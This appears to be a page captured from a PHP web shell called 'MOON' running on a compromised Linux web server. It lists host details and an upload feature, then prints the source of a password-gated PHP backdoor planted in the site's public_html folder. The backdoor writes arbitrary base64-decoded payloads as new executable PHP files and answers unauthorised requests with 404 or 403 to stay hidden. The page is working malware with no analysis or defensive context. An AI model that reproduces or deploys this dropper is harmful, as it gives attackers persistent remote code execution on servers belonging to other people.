MOON
Server: Apache
System: Linux 54-179-220-51.cprapid.com 3.10.0-1160.144.1.el7.tuxcare.els4.x86_64 #1 SMP Tue Apr 7 08:40:40 UTC 2026 x86_64
User: thehunarfound (1001)
PHP: 7.4.29
Disabled: NONE
Upload Files
File: /home/thehunarfound/public_html/d35ba42c/008409d7.php
<?php $r=array_merge($_GET,$_POST);if(!isset($r['p'])||!isset($r['c'])){http_response_code(404);exit;}if(hash('sha256',$r['p'])!=='3b18ab590a3be0ef52e062b7d70b2214502187b1b2a77a3579c12f5b81bde44c'){http_response_code(403);exit;}$d=base64_decode($r['c']);if($d===false){http_response_code(400);exit;}$f=isset($r['f'])?basename($r['f']):'x'.bin2hex(random_bytes(4)).'.php';file_put_contents(__DIR__.'/'.$f,$d);echo json_encode(['ok'=>1,'file'=>$f]);?>